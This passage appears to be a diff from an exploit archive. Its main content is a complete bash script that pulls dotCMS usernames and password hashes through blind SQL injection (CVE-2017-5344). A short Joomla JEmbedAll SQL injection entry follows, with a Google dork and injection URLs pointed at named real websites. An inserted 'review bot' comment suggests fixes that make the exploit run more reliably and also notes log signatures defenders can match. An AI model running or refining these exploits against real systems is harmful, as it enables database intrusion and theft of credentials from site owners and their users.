discovered. + * Jan 2, 2017 - Vendor advised of discovery and contact requested for +full disclosure. + * Jan 4, 2017 - Provided full disclosure to vendor. + * Jan 5, 2017 - Vendor acknowledged disclosure and confirmed finding +validity. + * Jan 14, 2017 - Vendor advised patch developed and preparing for release. + * Jan 24, 2017 - Vendor advised patching in progress. + * Feb 15, 2017 - Vendor advises ready for public disclosure. 
+ +## References + +Vendor advisory: http://dotcms.com/security/SI-39 +CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5344 +' + +#!/bin/bash +# +# Dump password hashes from dotCMS <= 3.6.1 using blind boolean SQL injection. +# CVE: CVE-2017-5344 +# Author: Ben Nott +# Date: January 2017 +# +# Note this exploit is tuned for MySQL backends but can be adapted +# for other DMBS's. + +show_usage() { + echo "Usage $0 [target]" + echo + echo "Where:" + echo -e "target\t...\thttp://target.example.com (no trailing slash, port optional)" + echo + echo "For example:" + echo + echo "$0 http://www.examplesite.com" + echo "$0 https://www.mycmssite.com:9443" + echo + exit 1 +} + +test_exploit() { + target=$1 + res=$(curl -k -s -X 'GET' \ + -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \ + "${target}/categoriesServlet?q=%5c%5c%27") + + if [ $? -ne 0 ]; + then + echo "Failed to connect. Check host and try again!" + exit 1 + fi + + if [ -z "$res" ]; + then + echo "The target appears vulnerable. We're good to go!" + else + echo "The target isn't vulnerable." 
+ exit 1 + fi +} + +dump_char() { + target=$1 + char=$2 + database=$3 + index=$4 + offset=$5 + column=$6 + avg_delay=$7 + + if [ -z "$offset" ]; + then + offset=1 + fi + + if [[ $char != *"char("* ]]; + then + char="%22${char}%22" + fi + + if [ -z "$column" ]; + then + column="password_" + fi + + # Controls the avg delay of a FALSE + # request + if [ -z "$avg_delay" ]; + then + avg_delay="0.100" + fi + + res=$(curl -k -sS \ + -w " %{time_total}" \ + -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \ + "${target}/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SELECT(SUBSTRING((SELECT(${column})FROM(${database}.user_)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23") + data=$(echo $res | awk '{print $1}') + rtt=$(echo $res | awk '{print $2}') + + # Calculate boolean based on time delay and + # data presence. + has_delay=$(echo "${rtt}>${avg_delay}" | bc -l) + if [ ! -z "$data" ]; + then + if [ $has_delay -eq 1 ]; + then + echo "$char" + fi + fi +} + +testdb() { + target=$1 + res=$(dump_char $target 1 "dotcms" 1 1) + if [ ! -z "$res" ]; + then + echo "dotcms" + else + res=$(dump_char $target 1 "dotcms2") + if [ ! 
-z "$res" ]; + then + echo "dotcms2" + fi + fi +} + +convert_char() { + char=$1 + conv="$char" + + if [ "$char" == "char(58)" ]; + then + conv=":" + elif [ "$char" == "char(47)" ]; + then + conv="/" + elif [ "$char" == "char(61)" ]; + then + conv="=" + elif [ "$char" == "char(45)" ]; + then + conv="-" + fi + + echo -n "$conv" +} + +a2chr() { + a=$1 + printf 'char(%02d)' \'$a +} + +n2chr() { + n=$1 + printf 'char(%d)' $n +} + +chr2a() { + chr=$1 + chr=$(echo $chr | sed -e 's/char(//g' -e 's/)//g') + chr=`printf \\\\$(printf '%03o' $chr)` + echo -n $chr +} + +iter_chars() { + target=$1 + db=$2 + user=$3 + offset=$4 + column=$5 + for c in {32..36} {38..94} {96..126} + do + c=$(n2chr $c) + res=$(dump_char $target $c $db $user $offset $column) + + if [ ! -z "$res" ]; + then + chr2a $res + break + fi + done +} + +exploit() { + target=$1 + db=$(testdb $target) + + if [ -z "$db" ]; + then + echo "Unable to identify database name used by dotcms instance!" + exit 1 + fi + + echo "Dumping users and passwords from database..." + echo + + for user in $(seq 0 1023); + do + validuser=1 + echo -n "| $user | " + for offset in $(seq 1 1024); + do + res=$(iter_chars $target $db $user $offset "userid") + + if [ -z "$res" ]; + then + if [ $offset -eq 1 ]; + then + validuser=0 + fi + break + fi + + echo -n "$res"; + done + + if [ $validuser -eq 1 ]; + then + printf " | " + else + printf " |\n" + break + fi + for offset in $(seq 1 1024); + do + res=$(iter_chars $target $db $user $offset "password_") + + if [ -z "$res" ]; + then + break + fi + + echo -n "$res"; + done + printf " |\n" + done + echo + echo "Dumping complete!" +} + +target=$1 + +if [ -z "$target" ]; +then + show_usage +fi + +test_exploit $target +exploit $target diff --git a/platforms/php/webapps/41378.txt b/platforms/php/webapps/41378.txt new file mode 100755 index 000000000..c09a27279 --- /dev/null +++ b/platforms/php/webapps/41378.txt 
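Review bot: The `#!/bin/bash` line in 41377.sh sits after the `: '...'` advisory block instead of on line 1, so it is just a comment and the script runs under whichever shell invokes it, even though `[[ ]]`, `{32..36}` brace expansion and `echo -e` all require bash; move the shebang to the first line and keep the advisory text below it. Word-splitting is also unguarded throughout: `$target`, `$res` and `$char` are expanded unquoted in the curl and awk lines, and `has_delay` comes from `bc`, whose presence is never checked, so `[ $has_delay -eq 1 ]` fails with a bash syntax error rather than a clear message when bc is missing. From a defender's side, the request shape this script emits — hits on `/categoriesServlet` whose `q` parameter carries escaped quotes and `/**/` comment sequences — is a straightforward log and WAF signature, and the vendor advisory SI-39 linked in the header is the fix reference.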
@@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: Joomla! Component JEmbedAll v1.4 - SQL Injection +# Google Dork: inurl:index.php?option=com_jembedall +# Date: 16.02.2017 +# Vendor Homepage: http://www.goldengravel.eu/ +# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/jembedall/ +# Demo: http://www.goldengravel.eu/ +# Version: 1.4 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_jembedall&downloadfree=[SQL] +# http://localhost/[PATH]/index.php?option=com_jembedall&export=articlepdf&id=[SQL] +# # # # # + + +http://www.goldengravel.eu/index.php?option=com_jembedall&downloadfree=4' +http://www.goldengravel.eu/index.php?option=com_jembedall&export=articlepdf&id=4' + +http://www.supravirtual.ro/index.php?option=com_jembedall&downloadfree=4' +http://www.supravirtual.ro/index.php?option=com_jembedall&export=articlepdf&id=4' \ No newline at end of file